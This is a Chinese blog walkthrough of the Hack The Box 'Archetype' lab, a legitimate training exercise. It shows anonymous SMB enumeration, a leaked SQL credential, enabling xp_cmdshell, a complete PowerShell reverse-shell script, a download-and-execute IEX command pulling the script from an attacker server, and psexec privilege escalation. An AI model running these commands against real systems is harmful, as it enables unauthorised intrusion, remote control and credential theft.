hackthebox_Archetype

最新推荐文章于 2024-05-28 21:06:10 发布
最新推荐文章于 2024-05-28 21:06:10 发布
阅读量1.2k 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/115269502
版权

文章目录

信息收集

在这里插入图片描述

扫描

根据网站的提示,我们连上vpn的目标机的ip是10.10.10.27

nmap -sC -sV 10.10.10.27

-sC:使用默认脚本进行扫描,等同于–script=default
-sV:探测开启的端口来获取服务、版本信息
在这里插入图片描述
可以发现,目标开启了135、139、445、1433端口,其中1433是SQL Server数据库默认使用的端口,445是文件共享协议(SMB)默认使用的端口

测试445端口

测试445端口的SMB服务是否支持匿名访问,没有经过权限配置可能默认允许所有人无需身份认证来匿名访问共享资源,使用smbclient来访问samba服务器的共享资源:

smbclient -N -L //10.10.10.27/

-N:匿名登录
-L:获取共享资源列表
在这里插入图片描述
在共享资源列表内,发现存在一个backups目录,再次使用smbclient访问它:

smbclient -N //10.10.10.27/backups
在这里插入图片描述

使用dir命令列出backups文件夹下的文件,发现存在一个prod.dtsConfig文件,它是与SSIS一起使用的配置文件,使用get命令下载到主机上,使用cat命令查看一下文件内容 smbclient命令参数及用法详解
在这里插入图片描述
在这里插入图片描述
参考文章
工具的使用 | Impacket的使用
Impacket网络协议工具包介绍
下载并安装impacket工具

进入目录然后
在这里插入图片描述
我们这里先来看看mssqlclient.py 的参数列表
在这里插入图片描述
然后直接根据前面泄露的id和password登入
在这里插入图片描述
判断当前是否拥有sysadmin权限:

SELECT IS_SRVROLEMEMBER('sysadmin')

在这里插入图片描述
返回值是1,代表true,说明当前用户具有sysadmin权限,能够在靶机上使用SQL Server的xp_cmdshell来进行远程代码执行

使用数据库调用系统命令

以此写入

 EXEC sp_configure 'Show Advanced Options', 1;			\\使用sp_configure系统存储过程,设置服务器配置选项,将Show Advanced Options设置为1时,允许修改数据库的高级配置选项
 reconfigure;											\\确认上面的操作
 sp_configure;											\\查看当前sp_configure配置情况
 EXEC sp_configure 'xp_cmdshell', 1						\\使用sp_configure系存储过程,启用xp_cmdshell参数,来允许SQL Server调用操作系统命令
 reconfigure;											\\确认上面的操作
 xp_cmdshell "whoami" 									\\在靶机上调用cmdshell执行whoami

执行结束后,SQL会返回当前数据库进程的操作系统用户为archetype\sql_svc
在这里插入图片描述

获取操作系统普通用户权限

前,我们拥有了数据库的shell,也可以使用部分操作系统的命令,但是需要一个直接的操作系统shell来进行后续的操作
在桌面建立一个powershell的反向shell文件shell.ps1(注意修改其中的ip地址为接收shell的kali主机的地址),代码如下:

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.206",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

在这里插入图片描述
注意这个文件格式是ps1,这个是一个powershell格式的文件。

接下来,在kali中使用python搭建一个迷你http服务器,监听80端口来供靶机下载shell.ps1文件(注意不要切换目录,以防找不到文件):

python3 -m http.server 80

在这里插入图片描述
kali开启监听

nc -lvvp 443

在这里插入图片描述
接下来,回到数据库shell中,执行命令:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.206/shell.ps1\");"

在这里插入图片描述

显示这个就说说明成功了
在这里插入图片描述
在netcat中执行如下命令即可拿到需要提交的flag:

type C:\Users\sql_svc\Desktop\user.txt

可以发现sql_svc同时是操作系统普通用户、数据库和数据库服务用户,值得去检查频繁访问的文件或已执行的命令,使用如下命令来访问PowerShell历史记录文件:
在这里插入图片描述
发现administrator用户登录后将共享文件夹\Archetype\backups映射到T盘,后面是administrator用户名和它的密码,可以使用Impacket中的psexec.py来提权:

psexec.py administrator@10.10.10.27

输入密码后刚才获取的密码即可提权成功
在这里插入图片描述
执行如下命令可获取管理员的flag

type C:\Users\Administrator\Desktop\root.txt

在这里插入图片描述

multi4
关注
渗透测试练习靶场hackthebox——Starting Point Archetype攻略
TF0xn的博客
09-15 3059
目录连接配置扫描测试445端口连接数据库获取RCE 连接配置 选择EU或USA后,点击上方Download Connection Pack,下载xxxxx.ovpn,在命令行内键入:openvpn xxxxx.ovpn 如图所示,就连接成功了 扫描 根据网站提示,我们需要扫描10.10.10.27,使用nmap进行扫描:nmap -sC -sV 10.10.10.27 -sC:使用默认脚本进行扫描,等同于–script=default -sV:探测开启的端口来获取服务、版本信息 可以发现,目标开启
Hack The Box - STARTING POINT
小小郭的博客
03-06 2406
Hack The Box - STARTING POINT
HackTheBox-Archetype
LYJ20010728的博客
07-27 472
HackTheBox-Archetype连接配置信息收集测试445端口smbclient命令的使用方法 (补充)连接数据库使用数据库调用系统命令获取操作系统普通用户权限提权 连接配置 参考之前写的连接配置,文章链接 信息收集 根据网站提示,目标是10.10.10.27,使用nmap进行扫描 nmap -sS -A 10.10.10.27 发现目标开启了135、139、445、1433端口,其中1433是SQL Server数据库默认使用的端口,445是文件共享协议(SMB)默认使用的端口 测
『Hack The BoxArchetype
Ho1aAs‘s Blog
07-22 611
文章目录前言配置代理解题信息搜集SMBSQL Server拿shell*持久化shellUser Owns FlagSystem Owns Flag完 前言 操作基于Kali 2020,参照官方wp 配置代理 Kali连接下发的代理 openvpn xxx.ovpn ifconfig获取当前Kali的ip,10.10.14.*网段的ip 此时靶机可以ping通,靶机ip10.10.10.27 解题 信息搜集 用nmap扫一下 ports=$(nmap -p- --min-rate=1000 -T4
渗透测试靶场Hack The Box-Archetype学习
XXX26的博客
06-22 626
界面
hack the box靶场archetype靶机
zr1213159840的博客
03-19 949
照常打开靶机,看第一个问题 问:主机上的数据库服务时TCP的哪个端口? 答案:1433.可以通过以下命令扫描得出结果 nmap -sV -Pn 10.129.239.163 第二个问题: 问:非管理员的共享的文件夹是什么? 答案:backups。这题是看了提示才知道,提示说可以使用-N -L查看文件夹就能知道了。使用以下命令查看 smbclient -N -L 10.129.239.163 其中以$结尾的文件夹,都是需要管理员权限的。 第三个问题: 问:smb共享文件夹中的文件上,可能的密码是
maven_archetype-catalog.zip
06-16
《 Maven Archetype Catalog:加速Eclipse中的Maven项目创建 》 在软件开发过程中,Maven作为Java项目管理工具,其强大的依赖管理和构建能力深受开发者喜爱。然而,当我们使用Eclipse这样的集成开发环境(IDE)时,...
hackthebox:hackthebox.eu工作库
03-10
所有练习和包装盒。 欣赏:3 在CWD中工作,并在flag/标记(奖赏)。
PKIX_maven_archetype.rar
03-13
标题“PKIX_maven_archetype.rar”涉及到的是在使用Maven Archetype插件创建Maven项目时遇到的问题,以及与Java安全证书相关的错误。描述中提到的问题有两个主要方面:一是Maven Archetype创建的工程不完整,缺少了`...
Python库 | pybuilder_archetype_api-0.1.0-py3-none-any.whl
05-09
资源分类:Python库 所属语言:Python 资源全名:pybuilder_archetype_api-0.1.0-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子 Hack The Box笔测试和来自挑战 在这里,我们有Hack The Box的演练。
hack the box archetype靶场
最新发布
qq_42754807的博客
05-28 857
hack the box archetype
Hack The Box : Starting Point - Archetype
qq_60201815的博客
08-31 448
环境准备 攻击机:kali-linux 靶机:Archetype 需要下载的工具:impacket(GitHub链接:https://github.com/SecureAuthCorp/impacket) 从HTB下载Starting Point VPN,打开kali,利用openvpn连接,出现下图则连接成功。通过ping靶机ip验证是否连接成功。 渗透过程 先进行信息收集,利用nmap扫描目标开放端口和对应服务。 -sC:根据端口识别服务自动调用默认脚本 -sV:扫描目标主.
hack the box archetype 靶场练习
鸥鹭忘机
07-28 1413
连接靶机 首先下载openvpn的配置文件,建议使用UDP协议进行连接,如果使用TCP协议连接,在最后提权的一步提权的时候可能会失败。 总starting point中找到靶机archetype,并点击Join Machine开启靶机。当靶机启动后会显示该靶机的IP地址。但是现在还不能访问该IP地址。需要建立vpn隧道后才能通信。 通过openvpn连接到hack the box的服务器。 openvpn starting_point_rpsate.ovpn 其中starting_point_rpsa
hack the box archetype writeup
dlccom的博客
06-27 314
TASK1Q:Which TCP port is hosting a database server?A:1433 TASK2Q:What is the name of the non-Administrative share available over SMB?A:backups TASK3Q:What is the password identified in the file on the SMB share?A:M3g4c0rp123 TASK4Q:What script from I
HTB Hack The Box -- Archetype
Gh0st_1n_The_Shell的博客
09-06 312
要是不知道怎么连接htb的靶机可以查看我的文章 如何连接Hack The Box的靶机?博客园 如何连接Hack The Box的靶机?CSDN 信息收集 先用nmap扫描对方开放了什么服务 攻击 首先比较引人注意的是 445smb服务,1433SQLServer服务 看到445服务就想到永恒之蓝漏洞,然而在这里应该是windows server的版本比较高(2019),所以应该是已经打了永恒之蓝的补丁 我们可以登陆一下smb服务,看看是否需要密码登录,没有经过权限配置可能默认允许所有人无需身份认证来匿名
Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified
Tajang的大千世界
03-08 2141
不想丸辣
Hack The Box : Starting Point - Vaccine
qq_60201815的博客
09-13 677
攻击机:kali-linux 靶机:Oopsie --------------------------------------------------------------------------------------------------------------------------------- 网络配置:操作与Archetype靶机相同,链接:Hack The Box : Starting Point - Archetype_丶 Chave的博客-CSDN博客 渗透过程 已知目标
Hackthebox初体验
leoriclee的博客
05-08 1302
在kali下装置这几个源 apt-get install network-manager-openvpn apt-get install network-manager-openvpn-gnome apt-get install network-manager-pptp apt-get install network-manager-pptp-gnome apt-get install netwo...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值